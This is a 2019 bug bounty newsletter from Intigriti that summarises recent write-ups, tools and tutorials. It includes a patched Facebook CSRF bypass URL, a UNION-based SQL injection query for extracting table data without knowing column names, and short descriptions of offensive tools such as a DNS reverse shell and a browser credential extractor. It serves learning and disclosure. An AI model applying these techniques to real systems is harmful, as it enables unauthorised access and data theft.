Bug Bytes #6 -25k Facebook CSRF, how to get IDOR, a raise and more!

By Intigriti

February 19, 2019

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.

Sign up for the newsletter here.

Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 08 of February to 15 of February.

Our favorite 5 hacking items

1. Tool of the week

Dnsgrep & Tutorial

This is a great new tool for quickly searching large DNS datasets like those from the Rapid7 Project Sonar.
It’s like grep except it can search dozens of gigabytes of data really fast.
You can either install it and use it locally, or use the online version. But the author said he will likely take down the online service in the future.

2. Writeup of the week

CSRF on Facebook

This is what a $25,000 bug on Facebook looks like!
The URL https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX triggers a POST request to whatever relative path is specified in XXXX. The problem is that it also adds a CSRF token automatically to the request body, which makes it vulnerable to CSRF.
Basically, leveraging this vulnerable URL allows executing any other POST request while bypassing CSRF protections. The writeup details many different ways to exploit this: how to delete other user accounts, post on someone else’s timeline, delete profile pictures and most importantly perform account takeovers.
This is a great example of a well written detailed writeup, which includes business impacts and technical details. The bounty is well deserved!

3. Video of the week

Web Security 101 – Insecure Direct Object Reference – You are who you say you are, right?

PwnFunction is an excellent Youtube channel for anyone interested in Web app hacking. The style reminds me of a mix between Hacker101 and LiveOverflow.
This particular video explains how IDOR works, the link with forced browsing and HTTP parameter pollution, what to do when you find an IDOR but cannot exploit it, how to bypass checks, etc.
Also, I love the humor… “Most of you might add a single or double quote at the end (of a URL like website.com/…?user_id=12) because it’s just an OCD thing at this point” 😀

4. Non technical item of the week

Salary Negotiation Tips from White Men in Tech: Part 1

This is a must read article for any woman in this industry.
I don’t understand why, but we generally have a tendency to ask for lower salaries than men. I noticed this from my own experience in two different countries (in Europe and Africa), and also from interviewing people. Men with a lot less qualifications than the women we finally hired were asking for much higher salaries.
When I was interviewed for my last job as a consultant, I was able to get a really good salary only thanks to my husband. He coached me on what to ask for, how to negotiate, the minimal salary that I would accept, etc. And the minimum he told me was sky high in my mind and I was very uncomfortable asking for that. But guess what… I got it and deserved it considering the job that I had to do!
So if you are looking for a job or for a raise, and you have trouble asking for what you’re really worth, the tangible advice in this article could help a lot.

5. Tutorial of the week

[Sqli] Extracting data without knowing columns names & Similar technique

This is a great tutorial on how to exploit an SQL injection without knowing column names.
You might need this if you can’t get column names because a WAF blocks calls to information_schema, and bruteforcing the names doesn’t work.
The trick is to use select 1,2,3,4,5,6 union select * from users; instead of select * from users;.

Other amazing things we stumbled upon this week

Videos

Podcasts

Webinars & Webcasts

Conferences

Slides only

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Aurebesh.js: Translate JavaScript to other writing systems

  • Gorsair: A penetration testing tool for discovering and remotely accessing the exposed Docker APIs of vulnerable Docker containers

  • Hasherbasher: SQL injection via bruteforced MD5 hash reflection of random strings

  • Dnsdmpstr: Unofficial API & Client for dnsdumpster.com and hackertarget.com. Wrapper around only their free IP tools. Quick & lazy enumeration in one command

More tools, if you have time

  • Vhost-finder: Virtual host finder made in PHP

  • Uptux: Privilege escalation checks for Linux systemd

  • Chashell & Introduction: Reverse Shell over DNS

  • CookieMonster: C# tool for extracting cookie and credential data from browsers (currently only Google Chrome)

  • SecureCodeBox: A docker based environment for continuous security scans. Out of the box upport for Nmap, Nikto, SSLyze, SQLMap, Arachni, WPScan & Amass (also compatible with Burp Suite)

  • Freevulnsearch: Free and open NMAP NSE script to query vulnerabilities via the cve-search.org API

  • Pubsploit.py: Quick and dirty script to search for public exploits based on a CVE

  • Get-NetNTLM: Powershell module to get the NetNTLMv2 hash of the current user. “RCE as a low priv user and no credentials? Use Get-NetNTLM to get a crackable NetNTLMv2 hash”

  • Napper-for-tpm: TPM vulnerability checking tool for CVE-2018-6622. This tool will be published at Black Hat Asia 2019

Misc. pentest & bug bounty resources

Challenges

Articles

News

Breaches & Vulnerabilities

Malicious apps/sites

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 01/25/2019 to 02/01/2019.

Curated by Pentester Land & Sponsored by Intigriti

Sign up for the newsletter here.

 

You may also like